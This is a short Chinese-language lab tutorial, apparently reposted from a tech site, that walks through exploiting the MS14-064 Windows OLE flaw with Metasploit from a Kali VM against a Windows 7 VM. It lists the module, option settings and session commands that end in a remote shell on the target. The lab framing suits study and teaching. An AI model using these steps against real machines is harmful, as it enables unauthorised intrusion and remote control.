一、環境準備
利用VMware安裝win7虛擬機x1,kali Linux虛擬機x1.
二、實驗步驟
1.命令列輸入以下命令啟動metasploit
msfconsole

2.輸入以下命令搜索ms14漏洞,并在其中找到metasploit的漏洞利用模塊exploit/windows/browser/ms14_064_ole_code_execution
search ms14

3.輸入以下命令加載漏洞利用模塊
use exploit/windows/browser/ms14_064_ole_code_execution

這里可以看到我們的漏洞利用模塊已經被啟動,
4.輸入以下命令查看相關設定
show options

需要我們注意的是這里的AllowPowershellP默認為false,SRCVHOST默認為0.0.0.0,需要我們手動更改,
5.分別輸入以下兩個命令更改設定,注意這里我的kali虛擬機IP地址為192.168.15.138,可以在終端輸入ifconfig查看自己的IP地址,
set AllowPowershellP true //設定AllowPowershellP為true
set SRVHOST 192.168.15.138 //設定SRVHOST為192.168.15.138(需要更改為自己的kali虛擬機IP)

設定更改完成后在終端輸入exploit/rexploit執行可以得到一串URL地址,
6.輪到我們的受害者登場,開啟win7虛擬機,使用IE瀏覽器訪問剛才得到的地址,
這時只要點擊允許,這臺win7虛擬機就被我們拿下啦!
7.回到kali虛擬機終端可以看到我們的受害者win7(IP地址為192.168.15.140)已經被拿下
輸入以下命令查看
sessions -i

8.輸入以下命令進入shell
sessions -i 1
接下來就可以利用windows命令進行下一步的行動啦!

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/297419.html
標籤:其他
下一篇:web安全上
